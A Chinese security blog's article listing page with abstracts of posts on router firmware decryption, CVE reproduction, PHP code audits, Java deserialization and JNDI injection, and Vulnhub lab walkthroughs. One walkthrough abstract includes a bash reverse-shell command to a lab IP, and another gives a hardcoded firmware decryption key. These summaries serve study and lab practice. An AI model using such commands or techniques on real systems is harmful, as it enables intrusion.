自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(83)
  • 收藏
  • 关注

原创 DrayTek Vigor3910 工业路由器固件解密与逆向分析:CVE-2024-41592/23721漏洞复现

摘要:本文分析了DrayTek Vigor3910设备(固件版本4.3.2.6及以下)存在的两个安全漏洞:1)GetCGI函数在处理查询字符串参数时存在栈溢出漏洞(CVE-2024-41592),当处理大量"&"字符时会导致参数计数无限制增长;2)POST请求处理中存在目录遍历漏洞(CVE-2024-23721)。研究过程包括固件解密、逆向分析、QEMU模拟环境搭建和漏洞复现。通过分析sohod64.bin文件,定位到关键漏洞函数,并成功构造了导致设备崩溃的PoC。研究还揭示了设

2025-12-22 00:11:03 782

原创 崭新出厂,自研CipherForge小工具,攻破 D-Link M30 固件加密

1. 前言:项目背景与痛点解决在研究路由器时,拿到了其 v1.10 版本的固件 (不出所料,固件是加密的。传统的解密方法往往需要手动提取 Salt、配置复杂的 OpenSSL 命令,效率极低。。

2025-12-14 22:17:15 292

原创 AC15启动项分析,漏洞分析

摘要:本文详细分析了ARM架构下的栈溢出漏洞利用过程,重点演示了如何通过ROP链构造实现远程代码执行。首先配置网络环境并启动目标服务,通过gdb调试定位漏洞点。接着构造payload覆盖返回地址,利用libc中的gadget实现控制流劫持。最终通过组合pop指令、system函数地址和mov指令,成功执行系统命令并验证漏洞利用效果。文中还附带分析了两个命令注入漏洞(CVE-2024-2812和CVE-2024-30645)的利用方法,展示了不同漏洞场景下的攻击向量构造技巧。整个过程中特别强调了地址计算、栈布

2025-12-14 20:12:45 629

原创 M30A1_FW110B02固件解密,AES、EVP-ByTokey(SHA-256)

本文分析了D-Link M30A1路由器固件(110版本)的加密机制。研究发现该固件采用OpenSSL加密,使用AES-128-CBC算法,包含Salt值0xE5C9BB84466AF3C5。通过逆向工程确定了加密流程:1)从文件头提取IV和Salt;2)使用密钥"b4517d9b98e04d9f075f5e78c743e097"进行解密;3)通过SHA-256两轮KDF派生实际密钥和IV。最终成功解密固件,揭示了D-Link采用的密钥派生机制和安全设计思路。该研究为路由器固件安全分析提

2025-12-04 16:22:00 834

原创 mips简单栈溢出

摘要:该文章演示了一个MIPS架构下的栈溢出漏洞利用过程。首先通过C代码创建了一个存在gets函数漏洞的程序,编译时关闭了栈保护和NX保护。使用IDA分析后确定溢出点在gets函数处,并计划覆盖返回地址跳转到secret_function。通过pwndbg调试工具连接qemu模拟环境,设置断点定位溢出点。测试发现输入68字节后覆盖返回地址,最后编写Python脚本构造包含目标地址(0x400740)的payload成功实现跳转。整个过程展示了从漏洞分析到利用的完整流程,重点包括调试配置、偏移量计算和payl

2025-11-11 19:16:38 320

原创 代码审计-PHP专题&MVC开发&文件差异对比法&模版引擎&SSTI注入&RCE执行&1day分析

这里有一个eval函数,可以将传入的值以php代码执行,这里的data传入到$temdata里面,以GET形式或许其中的cid,我们追踪一下caijiDataOne这个方法。不过这里能看到第一个变量是固定变量,用到的intval,类型转换int类型,这个变量就是个数字,就是$scal,跑路。先看我们这个方法,两个要求,第一个移动文件不报错,第二个这个参数不为空。找到这个表单,f12或者全文件搜索weixin_verify_file。我们能看到这个方法,似乎是一个sql注入,我们传入$id这个变量。

2025-09-23 18:54:09 1000

原创 代码审计-PHP专题&MVC开发&控制视图&URL路由&文件定位&SQL注入&文件安全&1day分析

本文摘要:文章详细解析了MVC架构在PHP开发中的应用及安全审计要点。MVC流程包括控制器处理请求、模型操作数据、视图渲染结果。重点分析了MVC各层职能及对安全审计的影响,列举了PHP常见漏洞类型及关键词。通过LmxCMS和Rockoa两个案例,展示了SQL注入、文件安全等漏洞的挖掘方法,包括利用双重URL编码绕过过滤、通过路由分析定位漏洞等审计技巧。文章提供了完整的漏洞利用流程和Payload示例,为PHP MVC框架的安全审计提供了实用参考。

2025-09-17 21:19:19 735 2

原创 代码审计-PHP专题&原生开发&文件上传删除包含&文件操作监控&Zend源码解密&1day分析

摘要:本文分析了emlog和通达OA系统中存在的文件上传与删除漏洞。在emlog中,通过压缩带后门的模板/插件上传可触发漏洞,解压函数emUnZip未严格过滤导致任意文件上传;同时发现通过bak[]参数可实现任意文件删除。通达OA系统存在文件上传绕过漏洞,需设置特定参数(P≠0,DEST_UID=1等)并绕过.php后缀检测,文件包含漏洞则通过gateway.php的url参数实现目录穿越。文章提供了详细的漏洞复现步骤、关键代码分析及利用POC,包括监控脚本使用方法和具体攻击载荷构造技巧。

2025-09-15 18:40:51 984

原创 代码审计-PHP专题&原生开发&SQL注入&1day分析构造&正则搜索&语句执行监控&功能定位

这里我们翻找了一下,因为这里可控变量太多,并且没有什么具体的sql语句,所以我们查看一下调用的方法、函数等,这里找到一个delComment。数据库监控->user.php无可控->nickname->添加不可控->data.php可控->导出修改导入->触发二次注入。这里就出现了,上面是$ip,也就是我们要传入的值,然后下面一个sql语句,接收我们的值,这里看起来是可控的,因此可能存在漏洞。这里是关键点,我们传入的ip然后调用的是下面的del方法,我们追踪一下这个del方法。

2025-09-13 21:47:09 691

原创 第49天:Web开发-JavaEE应用&SpringBoot栈&模版注入&Thymeleaf&Freemarker&Velocity

摘要:本文介绍了SpringBoot框架中Thymeleaf、Freemarker和Velocity三种模板引擎的安全漏洞利用方法。主要内容包括:1)针对Thymeleaf的SSTI漏洞,通过构造恶意表达式实现命令执行;2)Freemarker模板注入漏洞,利用内置类执行系统命令;3)Velocity模板引擎漏洞,通过反射调用Runtime类执行命令。三种漏洞均需满足特定版本条件和模板变量可控的前提。文章提供了详细的POC代码和测试步骤,包括项目配置、控制器编写和漏洞利用方法,展示了模板引擎安全漏洞的潜在危

2025-09-06 11:18:29 946

原创 第47天:Web开发-JavaEE应用&JNDI注入&RMI服务&LDAP服务&DNS服务&高版本限制绕过

JNDI注入安全漏洞分析摘要 JNDI(Java命名和目录接口)作为统一资源访问接口,支持RMI、LDAP等协议,但存在注入风险。当应用程序调用InitialContext.lookup()方法处理外部可控URI时,攻击者可构造恶意Reference对象,诱使服务器加载远程恶意类文件执行任意代码。漏洞利用条件包括:1)目标系统使用低版本JDK(6u45/7u21之前);2)存在可控的lookup参数;3)网络可达。高版本JDK通过限制远程codebase加载(default false)缓解了风险,但仍有绕

2025-09-02 17:32:53 916

原创 Web开发-JavaEE应用&原生和FastJson反序列化&URLDNS链&JDBC链&Gadget手搓

Java反序列化漏洞利用链分析摘要 本文分析了两种典型的Java反序列化漏洞利用链:URLDNS链和FastJson的JdbcRowSetImpl链。URLDNS链利用JDK自带的HashMap和URL类,通过控制hashCode触发DNS查询;JdbcRowSetImpl链则利用FastJson反序列化时自动调用setter的特性,构造RMI注入实现RCE。两种链都利用了JDK自带类的特性,其中URLDNS链通过hashCode触发域名解析,JdbcRowSetImpl链则通过autoCommit触发JN

2025-08-30 14:30:21 691

原创 Web开发-JS应用&WebPack构建&打包Mode&映射DevTool&源码泄漏&识别还原

Webpack是一个主流的前端模块打包工具,支持JavaScript、CSS等多种资源打包,具有模块化开发、代码分割、性能优化等优势。但在配置不当的情况下可能出现源码泄漏风险,主要涉及mode和devtool参数设置。开发模式下会暴露源码路径,而错误的devtool配置会生成单独的sourcemap文件,导致源码可被还原。建议在生产环境使用production模式,并谨慎选择sourcemap配置以防止源码泄露。

2025-08-07 19:14:46 1199

原创 Web开发-JS应用&NodeJS&原型链污染&文件系统&Express模块&数据库通讯&审计

本文介绍了NodeJS环境搭建与安全开发的关键内容。首先详细说明了NodeJS安装及常用库(Express、body-parser等)的安装方法。其次,通过代码示例展示了文件操作、路由处理、数据库查询等功能实现,特别强调了使用res.send()在浏览器显示数据的方法。文章重点分析了NodeJS的安全问题,包括:1)SQL注入和任意文件读取风险;2)命令执行漏洞(RCE)的利用方式;3)原型链污染攻击原理及危害,通过修改对象原型可能导致的代码执行漏洞。最后提出了黑盒/白盒两种安全测试方法,为NodeJS应用

2025-08-07 15:45:22 291

原创 Web开发-JS应用&原生代码&前端数据加密&CryptoJS库&代码混淆&Obfuscator库

使用变量替换、僵尸函数、字符串阵列化、控制流平坦化、调试保护等手段,使代码变得难以阅读和分析,达到最终保护的目的,不影响代码原有功能,是理想、实用的javascript保护方案。参考:https://www.cnblogs.com/Lrn14616/p/10154529.html。明文加密->客户端发送->密文数据传输-服务端接受数据->解密数据->处理数据。2、发现敏感信息(硬编码的帐号、pass、API密钥、注释等等)1、发现更多的有利用价值的信息(URL、域名、路径等等)

2025-08-06 15:21:42 603

原创 Web开发-JS应用&原生代码&Ajax技术&JQuery库&Axios库&前端校验&安全结合

本文介绍了JavaScript在Web开发中的核心应用,包括动态页面交互、数据验证、浏览器检测等功能实现。重点讲解了AJAX技术原理(异步请求、局部刷新)和三种实现方式:原生XMLHttpRequest、jQuery库和Axios库的代码示例,涵盖GET请求、文件上传等典型场景。同时指出前端安全风险:如硬编码凭据泄露、XSS漏洞、JS验证可被绕过(修改/禁用JS)等问题,强调需要前后端双重校验。附带W3School等权威学习资源链接,为开发者提供从基础到实践的完整技术参考。

2025-08-05 17:53:13 360

原创 Web开发-PHP应用&文件操作安全&上传下载&任意读取删除&目录遍历&文件包含

include函数,就是我们创建一个1.txt文件,内容是php,但是我们网页职业访问就没办法执行php命令,然后我们用include()函数将1.txt内容包含进来然后执行。这里我们创建一个1.php里面是phpinfo(),然后我们这个源码里用r接收传参值,然后定义$action函数,文件包含这个传入的函数。设置配置文件中,只能访问本目录。$_FILES["表单值"]["tmp_name"] 获取上传的临时副本文件名。$_FILES["表单值"]["error"] 获取上传时发生的错误代码。

2025-08-04 16:04:38 427

原创 Web开发-PHP应用&TP框架&MVC模型&路由访问&模版渲染&安全写法&版本漏洞

本文主要介绍了ThinkPHP框架的访问方式、数据接收、数据库操作及安全审计等内容。首先讲解了TP框架的两种URL访问格式,包括标准路径和早期版本参数传递方式。接着说明了请求变量接收和数据库查询操作的方法,演示了通过input函数和DB类实现数据查询的过程。在安全方面,文章分析了自写代码逻辑可能存在的安全隐患,并提供了ThinkPHP版本漏洞检测思路,建议通过历史漏洞库进行审计。最后以WeMall系统为例,介绍了通过识别框架版本、配置伪静态来测试漏洞的具体方法,强调使用自动化工具进行漏洞检测的重要性。

2025-08-01 22:08:45 500

原创 Web开发-PHP应用&组件框架&前端模版渲染&三方插件&富文本编辑器&CVE审计

Laravel现代化、功能全面的框架,适合大多数Web应用。Symfony高度模块化、功能强大的框架,适合复杂应用。轻量级框架,适合快速开发。企业级框架,适合大规模应用,具有高扩展性和性能。Yii高性能框架,适合快速开发和大规模应用。强大的ORM工具,支持复杂的查询和映射。Laravel内置ORM,简化数据库操作。PDOPHP的数据库抽象层,支持多种数据库引擎。RedBeanPHP轻量级ORM,自动创建和管理数据库表。Twig灵活、现代的模板引擎,常用于Symfony项目。

2025-08-01 15:45:05 1128

原创 Web开发-PHP应用&弱类型脆弱&Hash加密&Bool类型&Array数组&函数转换比较

在使用 json_decode() 函数或 unserialize() 函数时,部分结构被解释成 bool 类型,也会造成缺陷,运行结果超出研发人员的预期。两个等号==是弱比较,使用==进行对比的时候,php解析器就会做隐式类型转换,如果两个值的类型不相等就会把两个值的类型转为同一类型进行对比。低版本的strcmp比较的是字符串类型,如果强行传入其他类型参数,会出错,出错后返回值0,正是利用这点进行绕过。这里弱类型可以创造一个账号密码,发现密码是md5加密,前面有0e开头,那么任意0e开头都可以登录成功。

2025-08-01 11:02:09 818

原创 Web开发-PHP应用&Cookie脆弱&Session固定&Token唯一&身份验证&数据库通讯

本文介绍了Web开发中常见的用户身份验证技术。主要内容包括:1)数据库登录验证的实现流程;2)Cookie验证的原理和使用方法,包括设置和删除操作;3)Session验证的工作机制及其与Cookie的区别;4)引入Token防止暴力破解的Session+Token验证方案;5)通过两个CMS案例分析了Cookie和Session的安全漏洞。文章详细对比了Cookie和Session在存储位置、安全性、容量等方面的差异,阐述了Token验证的优势,包括提高安全性、支持跨域访问等特点。最后总结了不同验证技术的适

2025-07-31 20:04:54 928

原创 Web开发-PHP应用&原生语法&全局变量&数据接受&身份验证&变量覆盖&任意上传(代码审计案例)

文章摘要:本文介绍了PHP开发常用工具组合(DW+PHPStorm+PhpStudy+NavicatPremium)及PHP安全开发要点。重点分析了变量覆盖、数据接收、文件上传和身份验证等安全风险,包括$_GLOBALS、$_REQUEST等超全局变量的安全隐患。通过DuomiCMS和YcCMS两个案例,详细演示了变量覆盖漏洞利用和文件上传绕过技术,其中特别分析了使用$_SESSION伪造管理员身份的具体方法(需满足session_start()条件),以及通过MIME类型检测绕过文件上传限制的技巧。文章为

2025-07-31 16:01:38 657

原创 Web-SQL注入&数据库类型&用户权限&架构分层&符号干扰&利用过程&发现思路

摘要:本文系统讲解了SQL注入攻击的原理与利用方法。从数据库基本结构(库名、表名、列名)到权限管理机制,详细分析了不同数据库(MySQL、Oracle、SQLite、MongoDB等)的注入技术差异。核心内容包括:1)注入产生原理(可控变量执行SQL语句);2)6大影响因素(数据库类型、操作方法、参数类型等);3)典型利用流程(判断类型→获取结构→提取数据);4)各数据库注入特征与Payload构造技巧(如MySQL的information_schema查询、SQLite的sqlite_master表)。通

2025-07-20 16:13:54 1210

原创 开发框架安全&ThinkPHP&Laravel&SpringBoot&Struts2&SpringCloud&复现

ThinkPHP是一套开源的、基于PHP的轻量级Web应用开发框架综合工具:武器库-Thinkphp专检(3-6版本)如何判断是TP6框架开发的web程序,基于源码、路径、图标、基于报错可发现dex.php?=xxx在其6.0.13版本及以前=phpinfo()?

2025-07-19 18:02:57 794

原创 服务攻防-Java组件安全&FastJson&高版本JNDI&不出网C3P0&编码绕WAF&写入文件CI链

原创 朝阳2025年07月18日 09:23湖北标题已修改演示环境:FastJson全版本Docker漏洞环境(涵盖1.2.47/1.2.68/1.2.80等版本),主要包括JNDI注入及高版本绕过、waf绕过、文件读写、原生反序列化、利用链探测绕过、不出网利用等。从黑盒的角度覆盖FastJson深入利用。

2025-07-18 15:39:45 1307

原创 服务攻防-Java组件安全&数据处理&FastJson&JackSon&XStream&自动BP插件&CVE漏洞

本文分析了Java应用中常见的JSON/XML反序列化漏洞,重点探讨了Jackson、Fastjson和XStream三大组件的安全风险。文章详细列举了各组件的历史漏洞(如CVE-2020-8840、CVE-2021-21351等),并提供了具体的漏洞检测方法:通过Content-Type识别数据格式(application/json或application/xml),利用报错信息判断组件类型,以及构造特定POC进行验证。特别针对JNDI注入攻击场景,给出了包括RMI、LDAP等多种利用方式的payload

2025-07-16 19:01:05 1082

原创 vulnhub靶机渗透:PWNLAB: INIT

以下是该代码,我们使用strings查看msg2root,这里有一个/bin/echo %s >> /root/messages.txt。这里是能切换到kane用户的,然后这里有个文件有点可疑 find / -perm -4000 2>/dev/null。这个文件看完了就是只允许上传(".jpg",".jpeg",".gif",".png")四种类型文件,白名单。说是在内联网上上传和共享图片文件,应该是制作图片马,这里不出意外是爆破登录后台然后上传木马了,试试。这里连接一下mysql,查看一下信息。

2025-07-07 17:48:40 806

原创 Vulnhub-TommyBoy1dot0

1、只有tom(大汤姆)有登录的密码 2、有一个 callahanbak.bak 的备份文件,需要你将其重命名为index.html 3、有一个ftp服务,放在一个大多数扫描器都扫不到的端口上,每过15分钟上线 4、nick重置了它的账号为,nickburns sup3rl33t这是nick的密钥。这里重启了几次才能访问wp这个站点,那我们就继续渗透了,然后这个是个wp站,我们扫一下,看看有没有什么信息。淦,看的云里雾里的 这里看了其他师傅wp,说是通过手机访问,那我们就加一个ua头。

2025-06-26 12:17:40 739

原创 vulnerable_docker_containement(hard难度)MSF内网穿透、docker逃逸、wpscan爆破。

ok,转发成功,这里反弹一个shell,因为这个是docker环境,不能做什么操作 bash -i >& /dev/tcp/192.168.66.129/7777 0>&1 这里出了点问题,就是我的kali端口转发后访问127.0.0.1:8022端口后的页面关闭了之后就再也无法访问了,这里就借鉴其他师傅的wp了。ok,这里扫出来两个端口,一个8000端口一个22端口,我们先看看8000端口有什么东西。ok,这里找到了个ip,应该和上台靶机一样的 老规矩,探测一下内网存活i。怪可爱的,msf的logo。

2025-06-15 17:12:03 469

原创 Web基础-(第三天)Web应用&OSS存储&负载均衡&CDN加速&反向代理&WAF防护&部署影响

本文概述了五种Web安全防护技术的原理与影响:1)Web应用防火墙(WAF)拦截安全测试;2)CDN隐藏源IP导致测试错误;3)OSS云存储使文件解析受限;4)反向代理使访问目标非真实服务器;5)负载均衡导致多目标测试。演示涉及雷池WAF安装、阿里云CDN/OSS配置及Nginx负载均衡,揭示了这些技术在提升安全性和性能的同时,也为渗透测试带来的识别与突破挑战。(149字)

2025-06-14 16:55:39 355

原创 vulnerable_docker_containement(easy难度)Frp、reGeorg隧道搭建内网穿透、docker逃逸、wpscan爆破。教学谈不上,纯技术分享

摘要:本文记录了一次针对Docker容器的渗透测试过程。通过端口扫描发现开放的Docker API(2375端口)和WordPress网站(8000端口)。利用wpscan爆破获取WordPress后台权限后,通过404.php获取初始shell。发现目标为Docker容器后,使用socat建立反向shell,并通过Linpeas脚本进行内网探测。随后使用frp进行内网穿透,发现172.18.0.3的8022端口开放Node.js服务。最后利用Docker Remote API未授权访问漏洞成功逃逸容器获取

2025-06-12 19:49:48 752

原创 Vulnhub_Zico2_wp

该渗透测试过程包括主机发现、端口扫描、目录爆破等步骤,发现目标开放80、22、111等端口。通过弱口令进入adbadmin后台,利用LFI+数据库漏洞创建test.php文件并植入木马,成功获取shell权限。最后利用sudo权限的文件进行提权,通过tarcf命令执行/bin/bash实现root权限获取。整个过程展示了从外网打点到权限提升的完整渗透路径。

2025-05-28 16:55:26 450

原创 破解逆向专辑(二)

1、本专辑灵感源于吾爱破解的yyhd大神,一个从零到一的破解系列,也为了补充一下自己的短板2、使用软件 DIEx64、x64dbg、OD、Immunity Debugger,与原文软件略有不同,因为是比较老版本的文章,这里选择了比较新的主流的软件进行学习3、软件功能 DIEx64,支持64位和32位数,主要进行查壳,并且die也能查询是什么语言写的并且查什么壳,OD分析的是程序的汇编代码。

2025-05-13 10:29:44 1576

原创 破解逆向专辑(一)

这里我们手上有一个机器码验证,无论我们输入什么都是密码错误,我们丢进X64bdg看一下这里的逻辑是这样的,JE;等于则跳转同JZ,既然每次都是登陆失败也就是说每次je条件都是不等于,就是失败的,那我们改成jne或者jnz就是说每次不等于跳转,自然就成功了。

2025-05-07 16:20:13 1752

原创 WebDeveloper 流量分析、sudo提权,靶场通关WP

做到这里我还有一个信息漏掉了,22端口,还没尝试这个端口是干嘛的 这里还是找配置文件 这里爆除了数据库文件。这里来一条shell,这里有个小坑,就是前文已经给了闭合符号记得删除闭合符号即可 还有一件事就是这里不要乱点更新,因为插入php代码再新版本已经删除了,不要乱点!进来了,对编码有点不敏感,最近靶机打的太少了,因该多补补,为什么说我很熟悉wp呢,因为我的博客也是wp搭建的。提权成功,但是我没有安装自己的方式去提权,等后面有时间会把这个坑补上,但也加深了这个提权的方式。这个一眼wp,这个页面没啥东西的。

2025-05-01 19:19:17 640

原创 DC-2寻找Flag1、2、3、4、5,wpscan爆破、git提权

a#使用并添加环境变量,将/bin 作为PATH环境变量导出export PATH=$PATH:/bin/ #将/usr/bin作为PATH环境变量导出export PATH=$PATH:/usr/bin。如果访问重定向报错记得在/etc/hosts中添加ip即可,在windows中的C:/Windows/System32/drivers/etc/HOSTS中添加ip dc-2即可成功。不过这里我们遇到了-rbash,这个含义就是说我们的bash是不完整的,很多命令无法执行,无法操作,我们需要绕过。

2025-04-23 17:06:42 532

原创 Vulnstack 红日安全内网靶场(一)外网打点,内网渗透、横向、提权,mimikatz、CS,一台非常不错的靶机

Vulnstack 红日安全内网靶场(一)外网打点,内网渗透、横向、提权,mimikatz、CS,一台非常不错的靶机

2025-04-23 01:08:21 1256

原创 Metasploitable2-Linux。关于老师给了任务,一位彦祖返回家无私奉献,打穿靶场的故事。手搓+msf提权漏洞利用

端口21vsftpd2.3.4笑脸后门漏洞22弱口令23弱口令25 CNNVD-200111-00453 ISC BIND80 http111 rpcbind139/445 smb512 rexec(远程计算机上运行命令)爆破1099 java-rmi1524 bind_shell2049 nfs2121 ftp3306 mysql3632 distccd5432 postgresql5900 vnc6667/6697 irc8009 ajp8180 tomcat示例

2025-04-07 23:22:19 1252

原创 Vulnhub-靶机-Oz。一台让人做呕的靶机,不要换平台打靶机

sqlmap -u "http://192.168.66.133/users" --dbs --batch 这一步我没成功,我从扫描目录哪里就感觉这台靶机有问题,因为users目录没扫出来,后面又是这个sqlmap无法注入,可能需要去htb打吧,不知道咋回事 这里我就截个图,在网上扒一个,下次打htb靶机直接去官网,就不下载下来了 最终账户和密码为:wizard.oz:wizardofoz22。这里我们发现扫描出来的目录回显404,回显200的长度为0,我们用wfuzz扫描返回200长度0的来枚举目录。

2025-04-03 18:53:45 958

原创 Vulnhub-PrinkysPalacev3

arp-scan -l 扫描同网段。

2025-04-03 15:42:39 758

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除